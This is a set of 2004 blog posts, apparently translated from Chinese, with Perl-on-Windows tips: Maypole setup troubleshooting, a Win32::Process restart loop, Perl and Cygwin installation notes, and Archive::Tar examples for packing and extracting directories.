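Move the template files under C:\.cpan\build\Maypole-2.04\templates into the beerdb directory.
One special case: maypole.css has to go into the directory at the same level as beerdb.
I added the database table structure following the article "使用 Maypole 构建 Web 应用程序" (Building Web applications with Maypole).
Visiting http://localhost/beerdb/ then more or less completes the setup. I will look into the rest another day.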

TroubleShooting

  • Access denied for user: '@localhost' to database 'beerdb'?
    With mysql, for example, if the setup line reads
    BeerDB->setup("dbi:mysql:beerdb");
    add the user and password to it:
    BeerDB->setup("dbi:mysql:beerdb","user","pass");
  • Can't locate object method "set_db" via package "BeerDB::Beer"?
    I hit this when using mysql on Win2000. Searching showed it to be a Class::DBI::mysql problem, and reinstalling that module kept failing. Installing the latest mysql4 release fixed it.


The Process Module under Win32

30 October 2004


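My task is simple: start a program (c:\a.exe), kill the process after 1 minute, start it again, and keep looping like that.

I had never used Win32::Process before; this is my first time, and I do not really understand things like child processes. For details, see perldoc Win32::Process.
Here is my code, as a reference for anyone with a similar task: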

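use strict;
use warnings;
use Win32;
use Win32::Process;

# turn the last Win32 error code into a readable message
sub ErrorReport {
    return Win32::FormatMessage(Win32::GetLastError());
}

while (1) {
    my ($ProcessObj, $exitcode);
    Win32::Process::Create($ProcessObj,
        "c:\\a.exe",
        "",
        0,
        NORMAL_PRIORITY_CLASS,
        ".") || die ErrorReport();

    $ProcessObj->GetExitCode( $exitcode );
    sleep 60;                                       # let the program run for one minute
    my $pid = $ProcessObj->GetProcessID();
    Win32::Process::KillProcess($pid, $exitcode);   # then terminate it
    sleep 1;
}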

Perl in Win32

30 October 2004


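Description

This post covers what is particular about Perl under Win32, including:
  • The simplest way to install Perl
  • Q1: Running C:\>perl gives the error "'perl' is not recognized as an internal or external command, operable program or batch file"?
  • Writing small programs with perl at the C:\> prompt?
  • Nmake
  • Installing the common Unix tools tar, gzip and make under Win32?
  • cpan Clone reports "'cl' is not recognized as an internal or external command"?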

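The simplest way to install Perl

Go to http://www.apache.org/dyn/closer.cgi/perl/win32-bin/Perl-5.8-win32-bin/ and download Perl-5.8-win32-bin.exe; that is all.
This binary bundles the latest Apache and Perl with matching mod_perl and mod_ssl / OpenSSL, and PHP as well.
For example, the July 2004 build was: Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4 mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.7

Q1: Running C:\>perl gives the error "'perl' is not recognized as an internal or external command, operable program or batch file"?

A1: Suppose Perl is installed in C:\usr and your Windows is 2000 (other versions work much the same). You need to append ";C:\usr\bin" to the Path environment variable before perl can be used normally.
Steps: right-click "My Computer" and choose "Properties"; on the "Advanced" tab click "Environment Variables..."; in the "System variables" list in the lower part of the dialog, edit Path and append ";C:\usr\bin" to its value.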

Writing small programs with perl at the C:\> prompt?

C:\>perl
print "hello world";
^Z
hello world
C:\>
Here ^Z means pressing Ctrl+Z, which marks the end of the code.

Nmake

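Nmake plays the same role under Win32 as make does under Unix/Linux. Many Perl scripts need it at install time.
The bin directory under the Perl installation directory contains a file named get_nmake.bat, which fetches Nmake15.exe via LWP.
The file is located at http://download.microsoft.com/download/vc15/Patch/1.52/W95/EN-US/Nmake15.exe

Installing the common Unix tools tar, gzip and make under Win32?

Probably because Perl grew up on Unix, Perl-related work often needs common Unix tools such as tar/gzip/make.
Recently I wanted to release a module, Lingua::Han2PinYin, and a module has to be packed with tar/gzip before it is uploaded to CPAN. Win32 does not come with these two tools.

The solution is Cygwin, software that provides a Linux-like environment on Win32. Installing Cygwin is very simple: download setup.exe from the Cygwin home page, run it, and click through the steps. Since only tar/gzip are needed, when selecting packages first deselect everything (click on All a few times), then install the Base category (which has tar/gzip) and part of Devel (which has make).
I do not really recommend installing X11; on my machine the graphical interface ran even slower than under VMware. Look through the other packages and install whatever you need.
If the installation runs into problems, search Baidu or Google; there are plenty of installation guides to consult.

cpan Clone reports "'cl' is not recognized as an internal or external command"?

Install Microsoft Visual C++ 6.0.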

Tar

30 October 2004


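Packing files with Tar

  1. A simple Archive::Tar example:
    use Archive::Tar;
    my $tar = Archive::Tar->new();
    my @file = ("1.cgi", "2.txt");
    $tar->add_files(@file);
    $tar->write("$dir/$name.tar"); # $dir is the directory to save into, $name is the file name
    
  2. If 1.cgi and 2.txt are not in the program's directory, the following must be added before $tar->add_files
    chdir $targetdir; # change to the directory holding the files; chdir is built in, and use Cwd is only needed to look up the current directory
    
  3. About @file
    If an element of @file includes a path, then extracting the resulting $name.tar creates folders along that path to hold that element's file.

  4. My routine for collecting all files under a directory, including the files in its subdirectories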
    sub GetDir {
    	my ($dir, $file_ref, $subdir) = @_;
    	if (($subdir ne "") && ($subdir !~ /\/$/)) { $subdir = "$subdir/"; }
    	opendir (DIRS, "$dir");
    	my @dirdata = readdir(DIRS);
    	closedir (DIRS);
    	foreach (@dirdata) {
    		next if (/^\.+$/);
    		if (-d "$dir/$_") {
    			&GetDir("$dir/$_", $file_ref, "$subdir$_");
    		} else {
    			push (@$file_ref, "$subdir$_");
    		}
    	}
    }
    
  5. A complete example
    #!/usr/bin/perl
    # By 非四(Fayland) @ http://www.1313s.com/
    use CGI::Carp qw(fatalsToBrowser);
    use Archive::Tar;
    use Cwd;
    $|++;
    # two arguments: the absolute path of the directory to pack, then the absolute path where the tar file is saved
    my $tar = Archive::Tar->new();
    my ($target, $savefile) = @ARGV;
    my @file;
    GetDir("$target", \@file);
    chdir "$target";
    $tar->add_files(@file);
    $tar->write("$savefile");
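
The hand-written recursion in step 4 could also be done with the core File::Find module. The following sketch is one possible replacement, not the code used in the original scripts; the helper name list_files_relative is hypothetical, and on Windows File::Spec would return paths with backslashes.

```perl
use strict;
use warnings;
use File::Find;
use File::Spec;

# Hypothetical helper: return the paths of all plain files below $dir,
# relative to $dir and sorted, ready to be passed to add_files()
# after a chdir($dir).
sub list_files_relative {
    my ($dir) = @_;
    my @files;
    find({
        no_chdir => 1,                       # keep the working directory unchanged
        wanted   => sub {
            return unless -f $File::Find::name;
            push @files, File::Spec->abs2rel($File::Find::name, $dir);
        },
    }, $dir);
    my @sorted = sort @files;
    return @sorted;
}
```

With this helper, the complete example would reduce to chdir $target followed by $tar->add_files(list_files_relative($target)).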
    

Extracting with Tar

use Archive::Tar;
use Cwd;
my $tar = Archive::Tar->new();
$tar->read("$from_dir/$target.tar"); # absolute path of the tar file
my @files = $tar->list_files();
#&createdir("$to_dir"); # create the target folder if it does not exist
chdir $to_dir;
$tar->extract(@files); # files are extracted relative to the current directory

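Personal experience

Because I am on shared hosting, I often have to move things around. Pulling the files down to a local machine one by one and uploading them again feels very slow.
My current space alone takes up a bit over 700 MB in roughly ten thousand files. On a Linux shared host, uploaded files also have to be chmod-ed to 666 before the program can modify them.
So the only good option is to tar and then untar: it is fast and needs no chmod.
More detailed working code can be found in NiBoard's cgi-bin/admin/tar.pl and untar.pl.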